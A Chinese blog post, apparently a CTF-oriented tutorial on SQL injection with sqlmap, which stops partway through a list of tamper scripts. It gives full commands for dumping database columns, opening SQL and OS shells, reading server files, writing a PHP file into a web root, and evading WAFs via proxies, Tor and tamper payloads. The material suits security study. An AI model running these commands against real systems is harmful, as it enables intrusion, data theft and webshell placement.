{"id":1367,"date":"2023-04-07T16:41:29","date_gmt":"2023-04-07T08:41:29","guid":{"rendered":"https:\/\/fushuling.com\/?p=1367"},"modified":"2024-03-05T19:35:38","modified_gmt":"2024-03-05T11:35:38","slug":"sql%e6%b3%a8%e5%85%a5%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/04\/07\/sql%e6%b3%a8%e5%85%a5%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3\/","title":{"rendered":"SQL\u6ce8\u5165\u4e00\u547d\u901a\u5173!"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">\u524d\u8a00<\/h1>\n\n\n\n<p>SQL\u6ce8\u5165\u5411\u6765\u662fWeb\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u57fa\u672c\u6280\u80fd\u4e4b\u4e00\uff0c\u57fa\u672c\u4e0a\u6bcf\u6b21\u9762\u8bd5\u9762\u8bd5\u5b98\u90fd\u4f1a\u95ee\u5230SQL\u6ce8\u5165\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4f46\u611f\u89c9\u7f51\u4e0a\u5f88\u591a\u603b\u7ed3\u90fd\u4e0d\u662f\u5f88\u5168\uff0c\u5982\u679c\u662f\u6211\u548c\u5176\u4ed6\u4eba\u804aSQL\u7684\u8bdd\uff0c\u4f1a\u6d89\u53ca\u5f88\u591a\u65b9\u9762\uff0c\u81f3\u5c11\u80fd\u804a\u4e2a\u534a\u4e2a\u5c0f\u65f6\u4ee5\u4e0a\uff0c\u8ba9\u9762\u8bd5\u5b98\u72e0\u72e0\u773c\u524d\u4e00\u4eae\uff0c\u56e0\u6b64\u5f00\u4e2a\u8fd9\u4e2a\u6587\u7ae0\u65e2\u4f5c\u4e3a\u81ea\u5df1\u7684\u603b\u7ed3\uff0c\u53c8\u4f9b\u4ed6\u4eba\u5b66\u4e60\u3002<\/p>\n\n\n\n<h1 
class=\"wp-block-heading\">sqlmap<\/h1>\n\n\n\n<p>\u804asql\u6ce8\u5165\u5c31\u4e0d\u80fd\u4e0d\u804asqlmap\uff0c\u5c31\u50cf\u63d0\u5f00\u653e\u4e16\u754c\u4e0d\u80fd\u4e0d\u63d0\u539f\u795e\u4e00\u6837\uff0csqlmap\u662f\u811a\u672c\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u5de5\u5177\u4e4b\u4e00\uff0c\u4ed6\u53ef\u4ee5\u514d\u53bb\u4f60\u81ea\u5df1\u5199\u811a\u672c\u7684\u9ebb\u70e6\uff0c\u76f4\u63a5\u5bf9\u76ee\u6807\u4e00\u628a\u68ad\uff0c\u9664\u6b64\u4e4b\u5916sqlmap\u7684\u8bbe\u8ba1\u6a21\u5f0f\u4ee5\u53ca\u6e90\u7801\u4e5f\u6709\u5f88\u591a\u503c\u5f97\u79f0\u8d5e\u7684\u4e1c\u897f\uff0c\u968f\u4fbf\u5728\u7f51\u4e0a\u4e00\u641c\u5c31\u80fd\u641c\u5230\u5f88\u591a\u5bf9sqlmap\u6e90\u7801\u7684\u5206\u6790\uff0c\u5f88\u591a\u65f6\u5019\u9762\u8bd5\u5b89\u5168\u5f00\u53d1\u9762\u8bd5\u5b98\u4e5f\u4f1a\u76f4\u63a5\u4e86\u5f53\u7684\u8be2\u95ee\u4f60\u6709\u6ca1\u6709\u53bb\u770b\u8fc7sqlmap\u7684\u6e90\u7801\u3002\u4e0d\u8fc7\u4eca\u5929\u5c31\u5148\u4e0d\u804asqlmap\u7684\u6e90\u7801\u4e86\uff0c\u4ee5\u540e\u6709\u673a\u4f1a\u53ef\u4ee5\u518d\u5f00\u4e2a\u6587\u7ae0\u8bb2\u8bb2sqlmap\u7684\u6e90\u7801\uff0c\u8fd9\u7bc7\u6587\u7ae0\u5c31\u53ea\u8bb2\u8bb2sqlmap\u7684\u4f7f\u7528\u3002(\u8bb0\u5f97\u4e4b\u524d\u6bd4\u8d5b\u65f6\u9047\u5230\u8fc7\u4e00\u9053sql\u9898\uff0c\u5168\u573a\u5c31\u4e00\u4e24\u89e3\uff0c\u7ed3\u679c\u6700\u540e\u770b\u5230wp\u5176\u5b9e\u662f\u53ef\u4ee5\u76f4\u63a5sqlmap\u4e00\u628a\u68ad\u51fa\u6765\u7684\uff0c\u6709\u70b9\u5c0f\u4e11\u4e86)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b80\u4ecb<\/h2>\n\n\n\n<p>\u53c2\u8003<a href=\"https:\/\/blog.csdn.net\/Gherbirthday0916\/article\/details\/126857683\">\u53f2\u4e0a\u6700\u8be6\u7ec6\u7684sqlmap\u4f7f\u7528\u6559\u7a0b<\/a>\uff0c\u6284\u4e00\u4e0b\u7b80\u4ecb\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow 
wp-block-quote-is-layout-flow\">\n<p>sqlmap\u662f\u4e00\u4e2a\u81ea\u52a8\u5316\u7684SQL\u6ce8\u5165\u5de5\u5177\uff0c\u5176\u4e3b\u8981\u529f\u80fd\u662f\u626b\u63cf\uff0c\u53d1\u73b0\u5e76\u5229\u7528\u7ed9\u5b9a\u7684URL\u8fdb\u884cSQL\u6ce8\u5165\u3002\u76ee\u524d\u652f\u6301\u7684\u6570\u636e\u5e93\u6709MySql\u3001Oracle\u3001Access\u3001PostageSQL\u3001SQL Server\u3001IBM DB2\u3001SQLite\u3001Firebird\u3001Sybase\u548cSAP MaxDB\u7b49\uff0c\u540c\u65f6sqlmap\u7684\u5f00\u53d1\u8005\u662f\u56fd\u9645\u77e5\u540d\u6218\u961fSuper Guesser\u7684\u6210\u5458\u4e4b\u4e00\uff0c\u5728\u56fd\u9645\u8d5b\u573a\u6709\u5341\u5206\u4eae\u773c\u7684\u6210\u7ee9\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>sqlmap\u662fkali\u91cc\u7684\u5185\u7f6e\u5de5\u5177\uff0c\u5b83\u652f\u63015\u79cdSQL\u6ce8\u5165\u6280\u672f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5e03\u5c14\u76f2\u6ce8\uff0c\u9875\u9762\u65e0\u56de\u663e\u65f6\uff0c\u5229\u7528\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6765\u5224\u65ad\u67e5\u8be2\u8bed\u53e5\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u65f6\u95f4\u76f2\u6ce8\uff0c\u9875\u9762\u65e0\u56de\u663e\u65f6\uff0c\u5229\u7528\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u5df2\u7ecf\u6267\u884c\u6765\u5224\u65ad\u67e5\u8be2\u8bed\u53e5\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u5229\u7528\u62a5\u9519\u4fe1\u606f\u8fdb\u884c\u6ce8\u5165<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165\uff0c\u5373Union\u8054\u5408\u6ce8\u5165<\/li>\n\n\n\n<li>\u5806\u53e0\u6ce8\u5165\uff0c\u5373\u5728\u5141\u8bb8\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u65f6\uff0c\u5229\u7528\u9017\u53f7\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6ce8\u5165<\/li>\n<\/ul>\n\n\n\n<p>\u5f53\u7136\u8fd9\u4e9b\u6ce8\u5165\u65b9\u6cd5\u53ea\u80fd\u8bf4\u662fweb\u5c0f\u5b50\u7684\u57fa\u672c\u529f\uff0c\u5927\u4f19\u90fd\u4f1a\uff0c\u9664\u4e86\u6ce8\u5165\u4e4b\u5916\uff0csqlmap\u8fd8\u652f\u6301\u6570\u636e\u5e93\u6307\u7eb9\u8bc6\u522b\u3001\u6570\u
636e\u5e93\u679a\u4e3e\u3001\u6570\u636e\u63d0\u53d6\u3001\u8bbf\u95ee\u76ee\u6807\u6587\u4ef6\u7cfb\u7edf\uff0c\u5e76\u5728\u83b7\u53d6\u5b8c\u5168\u7684\u64cd\u4f5c\u6743\u9650\u65f6\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u539f\u7406\u662f\u5229\u7528\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570sys_exec( )\u548csys_eval()\u6216\u8005\u76f4\u63a5\u5199\u9a6c\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u57fa\u7840\u547d\u4ee4<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>-u  \"url\"\t\t#\u68c0\u6d4b\u6ce8\u5165\u70b9\n--dbs\t\t\t#\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\u7684\u540d\u79f0\n--current-db\t        #\u5217\u51fa\u5f53\u524d\u6570\u636e\u5e93\u7684\u540d\u79f0\n-D\t\t\t#\u6307\u5b9a\u4e00\u4e2a\u6570\u636e\u5e93\n--table\t\t\t#\u5217\u51fa\u6240\u6709\u8868\u540d\n-T\t\t\t#\u6307\u5b9a\u8868\u540d\n--columns\t\t#\u5217\u51fa\u6240\u6709\u5b57\u6bb5\u540d\n-C\t\t\t#\u6307\u5b9a\u5b57\u6bb5\n-dump\t\t\t#\u5217\u51fa\u5b57\u6bb5\u5185\u5bb9\n<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u5982\u679c\u6211\u4eec\u60f3\u8981\u62ff\u5230www.dingzhen.com\u8fd9\u4e2a\u7f51\u7ad9ctfshow_web\u8fd9\u4e2a\u6570\u636e\u5e93\u91ccctfshow_user\u8fd9\u4e2a\u8868\u4e0bpass\u5b57\u6bb5\u7684\u6240\u6709\u6570\u636e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u www.dingzhen.com\/?id=1 -D ctfshow_web -T ctfshow_user -C pass -dump <\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u662f\u60f3\u4f7f\u7528POST\u65b9\u6cd5\u6ce8\u5165\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u8bf7\u6c42\u5305\u4fdd\u5b58\u4e3asql.txt\uff0c\u7528-p\u6307\u5b9a\u6ce8\u5165\u53c2\u6570\uff0c\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -r sql.txt -p id --dump<\/code><\/pre>\n\n\n\n<p>\u6216\u8005\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -r sql.txt --data=\"id=1\" --dump 
<\/code><\/pre>\n\n\n\n<p><strong>&#8211;sql-shell:\u8fd0\u884c\u81ea\u5b9a\u4e49SQL\u8bed\u53e5<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/4b8b52ce-89a7-43a2-b5a0-49f2ea4ef6a0.challenge.ctf.show\/api\/?id=1  --refer=ctf.show --sql-shell<\/code><\/pre>\n\n\n\n<p>\u8f93\u5165\u540e\u4f1a\u6709\u4e00\u4e2asql-shell&gt;\uff0c\u5728\u8fd9\u91cc\u8f93\u5165\u81ea\u5df1\u7684\u547d\u4ee4\u5373\u53ef\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"83\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1370\"  sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/div><\/figure>\n\n\n\n<p><strong>&#8211;os-cmd, &#8211;os-shell:\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/strong><\/p>\n\n\n\n<p>\u5f53\u4e3aMySQL\u6570\u636e\u5e93\u65f6\uff0c\u9700\u6ee1\u8db3\u4e0b\u9762\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5f53\u524d\u7528\u6237\u4e3a root<\/li>\n\n\n\n<li>\u77e5\u9053\u7f51\u7ad9\u6839\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/4b8b52ce-89a7-43a2-b5a0-49f2ea4ef6a0.challenge.ctf.show\/api\/?id=1  --refer=ctf.show --os-shell 
<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8ba9\u6211\u4eec\u9009\u62e9\u7f51\u7ad9\u7684\u811a\u672c\u8bed\u8a00\u4ee5\u53ca\u5224\u65ad\u7f51\u7ad9\u53ef\u5199\u76ee\u5f55\u7684\u65b9\u6cd5\uff0c\u65b9\u6cd5\u5206\u522b\u662f\u4f7f\u7528\u516c\u5171\u7684\u9ed8\u8ba4\u76ee\u5f55<br>\u3001\u81ea\u5b9a\u4e49\u7f51\u7edc\u6839\u76ee\u5f55\u7edd\u5bf9\u8def\u5f84\u3001\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684\u8def\u5f84\u6587\u4ef6\u3001\u66b4\u529b\u7834\u89e3\uff0c\u6211\u4eec\u5206\u522b\u9009\u62e94-&gt;php\u4ee5\u53ca1-&gt;\u9ed8\u8ba4\u76ee\u5f55\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"793\" height=\"266\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1371\"  sizes=\"auto, (max-width: 793px) 100vw, 793px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5373\u53ef\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-10.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
loading=\"lazy\" decoding=\"async\" width=\"647\" height=\"281\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1372\"  sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/div><\/figure>\n\n\n\n<p><strong>&#8211;file-read:\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/sqli\/Less-4\/?id=1\" --file-read \"c:\/test.txt\"<\/code><\/pre>\n\n\n\n<p><strong>\u4e0a\u4f20\u6587\u4ef6\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d(\u2014file-write \u2014file-dest<\/strong><\/p>\n\n\n\n<p>\u4f46\u6211\u4eec\u5fc5\u987b\u77e5\u9053\u76ee\u6807\u670d\u52a1\u5668\u7684\u7edd\u5bf9\u8def\u5f84\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/xxx\/sqli-labs\/Less-2\/?id=1  --file-write C:\\Users\\mi\\Desktop\\1.php --file-dest \"C:\\phpStudy\\PHPTutorial\\WWW\\2.php\" <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7ed5waf<\/h2>\n\n\n\n<p>\u5f53\u7136\u8fd9\u53ea\u662f\u6700\u57fa\u7840\u7684\u6ce8\u5165\u65b9\u5f0f\uff0c\u5f88\u5bb9\u6613\u88abwaf\u68c0\u6d4b\u5230\uff0c\u4e3a\u4e86\u589e\u52a0\u9690\u853d\u6027\uff0c\u6211\u4eec\u53ef\u4ee5\u589e\u52a0\u5176\u4ed6\u53c2\u6570\u89c4\u907f\u98ce\u9669\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>--random-agent    \u4f7f\u7528\u4efb\u610fHTTP\u5934\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5c24\u5176\u662f\u5728WAF\u914d\u7f6e\u4e0d\u5f53\u7684\u65f6\u5019\n--time-sec=3      \u4f7f\u7528\u957f\u7684\u5ef6\u65f6\u6765\u907f\u514d\u89e6\u53d1WAF\u7684\u673a\u5236\uff0c\u8fd9\u65b9\u5f0f\u6bd4\u8f83\u8017\u65f6\n--hpp             \u4f7f\u7528HTTP 
\u53c2\u6570\u6c61\u67d3\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5c24\u5176\u662f\u5728ASP.NET\/IIS \u5e73\u53f0\u4e0a\n--proxy=100.100.100.100:8080 --proxy-cred=211:985      \u4f7f\u7528\u4ee3\u7406\u8fdb\u884c\u7ed5\u8fc7\n--ignore-proxy    \u7981\u6b62\u4f7f\u7528\u7cfb\u7edf\u7684\u4ee3\u7406\uff0c\u76f4\u63a5\u8fde\u63a5\u8fdb\u884c\u6ce8\u5165\n--flush-session   \u6e05\u7a7a\u4f1a\u8bdd\uff0c\u91cd\u6784\u6ce8\u5165\n--hex \u6216\u8005 --no-cast     \u8fdb\u884c\u5b57\u7b26\u7801\u8f6c\u6362\n--mobile          \u5bf9\u79fb\u52a8\u7aef\u7684\u670d\u52a1\u5668\u8fdb\u884c\u6ce8\u5165\n--tor             \u533f\u540d\u6ce8\u5165<\/code><\/pre>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\u8fd8\u6709\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u4f7f\u7528--user-agent \u6307\u5b9aagent\n\u4f7f\u7528--referer \u7ed5\u8fc7referer\u68c0\u67e5\n\u4f7f\u7528--method \u8c03\u6574sqlmap\u7684\u8bf7\u6c42\u65b9\u5f0f \u5982PUT\n\u4f7f\u7528--cookie \u63d0\u4ea4cookie\u6570\u636e<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/01c7d214-3aa8-43db-be16-b210d02ac965.challenge.ctf.show\/api\/index.php  --cookie=3089874dc14bcc794d70b21cdd8bb544  --method=PUT --headers=\"Content-Type: text\/plain\" --data=\"id=1\" --refer=ctf.show --current-db --tables -T ctfshow_user --columns  -C pass -dump<\/code><\/pre>\n\n\n\n<p>sqlmap\u8fd8\u6709\u6709\u63a2\u6d4b\u7b49\u7ea7\u548c\u5371\u9669\u7b49\u7ea7(\u2014level 
\u2014risk)\u7684\u8bbe\u7f6e\uff1a<br>sqlmap\u4e00\u5171\u67095\u4e2a\u63a2\u6d4b\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u662f1\u3002\u7b49\u7ea7\u8d8a\u9ad8\uff0c\u8bf4\u660e\u63a2\u6d4b\u65f6\u4f7f\u7528\u7684payload\u4e5f\u8d8a\u591a\u3002\u5176\u4e2d5\u7ea7\u7684payload\u6700\u591a\uff0c\u4f1a\u81ea\u52a8\u7834\u89e3\u51facookie\u3001XFF\u7b49\u5934\u90e8\u6ce8\u5165\u3002\u5f53\u7136\uff0c\u7b49\u7ea7\u8d8a\u9ad8\uff0c\u63a2\u6d4b\u7684\u65f6\u95f4\u4e5f\u8d8a\u6162\u3002\u8fd9\u4e2a\u53c2\u6570\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0cGET\u548cPOST\u7684\u6570\u636e\u90fd\u4f1a\u8fdb\u884c\u6d4b\u8bd5\uff0cHTTP cookie\u5728level\u4e3a2\u65f6\u5c31\u4f1a\u6d4b\u8bd5\uff0cHTTP User-Agent\/Referer\u5934\u5728level\u4e3a3\u65f6\u5c31\u4f1a\u6d4b\u8bd5\u3002\u5728\u4e0d\u786e\u5b9a\u54ea\u4e2a\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u65f6\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u51c6\u786e\u6027\uff0c\u5efa\u8bae\u8bbe\u7f6elevel\u4e3a5\u3002<\/p>\n\n\n\n<p>sqlmap\u4e00\u5171\u67093\u4e2a\u5371\u9669\u7b49\u7ea7\uff0c\u4e5f\u5c31\u662f\u8bf4\u4f60\u8ba4\u4e3a\u8fd9\u4e2a\u7f51\u7ad9\u5b58\u5728\u51e0\u7ea7\u7684\u5371\u9669\u7b49\u7ea7\u3002\u548c\u63a2\u6d4b\u7b49\u7ea7\u4e00\u4e2a\u610f\u601d\uff0c\u5728\u4e0d\u786e\u5b9a\u7684\u60c5\u51b5\u4e0b\uff0c\u5efa\u8bae\u8bbe\u7f6e\u4e3a3\u7ea7<\/p>\n\n\n\n<p>\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx:7777\/Less-1\/\" --level=5 --risk=3 <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">tamper\u811a\u672c<\/h2>\n\n\n\n<p>\u6709\u65f6\u5019\u6211\u4eec\u7684\u6ce8\u5165\u4f1a\u9047\u5230\u5173\u952e\u5b57\u88abban\u7684\u60c5\u51b5\uff0csqlmap\u91cc\u5b58\u5728\u81ea\u5e26\u7684\u66ff\u4ee3\u811a\u672c\uff0c\u7528\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/Less-1\/?id=1\" --tamper=\"space2comment.py,space2plus.py\"<\/code><\/pre>\n\n\n\n<p>\u5177\u4f53tamper\u7684\u5185\u5bb9\u53ef\u4ee5\u770b\u5230<a 
href=\"https:\/\/blog.csdn.net\/weixin_49183673\/article\/details\/123371793\">sqlmap\u4e2dtamper\u7684\u7528\u6cd5<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>1\u3001apostrophemask.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u5f15\u53f7\u66ff\u6362\u4e3autf-8\uff0c\u7528\u4e8e\u8fc7\u6ee4\u5355\u5f15\u53f7\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper(\"1 AND '1'='1\")\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND %EF%BC%871%EF%BC%87=%EF%BC%871\n\n<strong>2\u3001base64encode.py\n<\/strong>\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u66ff\u6362base64\u7f16\u7801\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper(\"1' AND SLEEP(5)#\")\n\u4f7f\u7528\u811a\u672c\u540e\uff1aMScgQU5EIFNMRUVQKDUpIw==\n<strong>\n3\u3001multiplespaces.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u56f4\u7ed5sql\u5173\u952e\u5b57\u6dfb\u52a0\u591a\u4e2a\u7a7a\u683c\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 UNION SELECT foobar')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 UNION SELECT foobar\n\n<strong>4\u3001space2plus.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528:\u7528\u52a0\u53f7\u66ff\u6362\u7a7a\u683c\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT+id+FROM+users\n\n<strong>5\u3001space2randomblank.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u5176\u4ed6\u968f\u673a\u6709\u6548\u5b57\u7b26\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT%0Did%0CFROM%0Ausers\n\n<strong>6\u3001unionalltounion.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06union all select \u66ff\u6362\u4e3aunion select\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('-1 UNION ALL SELECT')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a-1 UNION 
SELECT\n\n<strong>7\u3001space2dash.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u7834\u6298\u53f7\uff08--\uff09\uff0c\u5e76\u6dfb\u52a0\u4e00\u4e2a\u968f\u673a\u5b57\u7b26\u548c\u6362\u884c\u7b26\uff08\\n\uff09\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND 9227=9227')\n\u9002\u7528\u811a\u672c\u540e\uff1a1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227\n\n<strong>8\u3001space2mssqlblank.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1amssql\n\u6d4b\u8bd5\u6570\u636e\u5e93\u7248\u672c\uff1aMicrosoft SQL Server 2000 \u3001Microsoft SQL Server 2005\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u6709\u6548\u5b57\u7b26\u96c6\u7684\u968f\u673a\u7a7a\u767d\u5b57\u7b26('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u9002\u7528\u811a\u672c\u540e\uff1aSELECT%0Did%0DFROM%04users\n\n<strong>9\u3001between.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005 \u3001MySQL 4, 5.0 and 5.5\u3001 Oracle 10g\u3001 PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5c06\"&gt;\"\u66ff\u6362\u4e3a\"NOT BETWEEN 0 AND #\"\uff0c\u5c06\"=\"\u66ff\u6362\u4e3a\"BETWEEN # AND #\"\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND A &gt; B--')\uff0ctamper('1 AND A = B--')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND A NOT BETWEEN 0 AND B--\uff0c1 AND A BETWEEN B AND B--\n\n<strong>10\u3001percentage.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aASP\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2000, 2005 \u3001MySQL 5.1.56, 5.5.11 \u3001PostgreSQL 9.0\n\u4f5c\u7528\uff1a\u5728\u6bcf\u4e2a\u5b57\u7b26\u524d\u52a0\u4e0a\u4e00\u4e2a%\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD FROM TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M 
